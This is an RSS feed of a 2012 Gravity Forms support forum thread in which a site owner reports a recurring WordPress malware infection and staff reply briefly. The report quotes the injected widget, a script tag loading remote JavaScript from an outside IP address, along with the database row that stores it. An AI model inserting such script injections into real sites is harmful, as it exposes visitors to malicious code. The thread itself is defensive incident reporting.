<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="bbPress/1.0.1" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>Gravity Support Forums Topic: Possible exploit?</title>
		<link>https://legacy.forums.gravityhelp.com/topic/possible-exploit</link>
		<description>Gravity Support Forums Topic: Possible exploit?</description>
		<language>en-US</language>
		<pubDate>Sat, 18 Apr 2026 16:28:32 +0000</pubDate>
		<generator>http://bbpress.org/?v=1.0.1</generator>
		<textInput>
			<title><![CDATA[Search]]></title>
			<description><![CDATA[Search all topics from these forums.]]></description>
			<name>q</name>
			<link>https://legacy.forums.gravityhelp.com/search.php</link>
		</textInput>
		<atom:link href="https://legacy.forums.gravityhelp.com/rss/topic/possible-exploit" rel="self" type="application/rss+xml" />

		<item>
			<title>David Smith on "Possible exploit?"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91622</link>
			<pubDate>Thu, 15 Nov 2012 18:50:47 +0000</pubDate>
			<dc:creator>David Smith</dc:creator>
			<guid isPermaLink="false">91622@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;Hi ionata,&#60;/p&#62;
&#60;p&#62;It looks like whatever this is is adding a text widget to your sidebar. Is Gravity Forms the last item in the sidebar? If so, there is a good chance it is just coincidentally under the Gravity Form widget.&#60;/p&#62;
&#60;p&#62;Hopefully the logging will provide more information on what event is triggering the injection and we can dig into this more from there.
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Chris Hajer on "Possible exploit?"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91430</link>
			<pubDate>Thu, 15 Nov 2012 08:19:24 +0000</pubDate>
			<dc:creator>Chris Hajer</dc:creator>
			<guid isPermaLink="false">91430@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;I'll bring this to the attention of the developers to see if they can spot anything in your report related to Gravity Forms.  Thank you.
&#60;/p&#62;</description>
		</item>
		<item>
			<title>ionata on "Possible exploit?"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91301</link>
			<pubDate>Thu, 15 Nov 2012 01:40:53 +0000</pubDate>
			<dc:creator>ionata</dc:creator>
			<guid isPermaLink="false">91301@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;Hey guys.&#60;/p&#62;
&#60;p&#62;We've been using Gravity Forms for quite a while now without any issue, but recently one of our sites has been regularly suffering from malware infections.&#60;/p&#62;
&#60;p&#62;It injects an entry into the wp_options table and attaches the extra div containing the offsite script below the Gravity Form widgets like thus:&#60;/p&#62;
&#60;pre&#62;&#60;code&#62;&#38;lt;div class=&#38;quot;textwidget&#38;quot;&#38;gt;
      &#38;lt;script type=&#38;quot;text/javascript&#38;quot; src=&#38;quot;http://61.19.251.27/web/cb.php&#38;quot;&#38;gt;&#38;lt;/script&#38;gt;
&#38;lt;/div&#38;gt;&#60;/code&#62;&#60;/pre&#62;
&#60;p&#62;Which, in the DB can be seen as: &#60;/p&#62;
&#60;p&#62;'mysql&#38;gt; select * from wp_options where option_value like &#34;%http://61.19.251.27/web/cb.php%&#34;;&#60;br /&#62;
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+&#60;br /&#62;
&#124; option_id &#124; option_name &#124; option_value                                                                                                                                                                                                                                   &#124; autoload &#124;&#60;br /&#62;
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+&#60;br /&#62;
&#124;        87 &#124; widget_text &#124; a:3:{i:3;a:3:{s:5:&#34;title&#34;;s:0:&#34;&#34;;s:4:&#34;text&#34;;s:0:&#34;&#34;;s:6:&#34;filter&#34;;b:0;}i:7;a:3:{s:5:&#34;title&#34;;s:1:&#34; &#34;;s:4:&#34;text&#34;;s:78:&#34;&#38;lt;script type=&#34;text/javascript&#34; src=&#34;http://61.19.251.27/web/cb.php&#34;&#38;gt;&#38;lt;/script&#38;gt;&#34;;s:6:&#34;filter&#34;;b:0;}s:12:&#34;_multiwidget&#34;;i:1;} &#124; yes      &#124;&#60;br /&#62;
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+&#60;br /&#62;
1 row in set (0.00 sec)'&#60;/p&#62;
&#60;p&#62;It's not a lot of information but its all we have at this stage. As I mentioned, it's happened once before - it's no trouble removing the infection when it occurs, but preventing it in the first place is giving us trouble. &#60;/p&#62;
&#60;p&#62;I've bumped up the logging for this site so that if it happens again we might get a better lock on it.  Also this is not an on-disk attack, that is to say that no files are modified.  So the injection is done through wordpress itself.  It may not be the Gravity Forms plugin that is the target of the exploit, but it does seem strangely close to it .
&#60;/p&#62;</description>
		</item>

	</channel>
</rss>
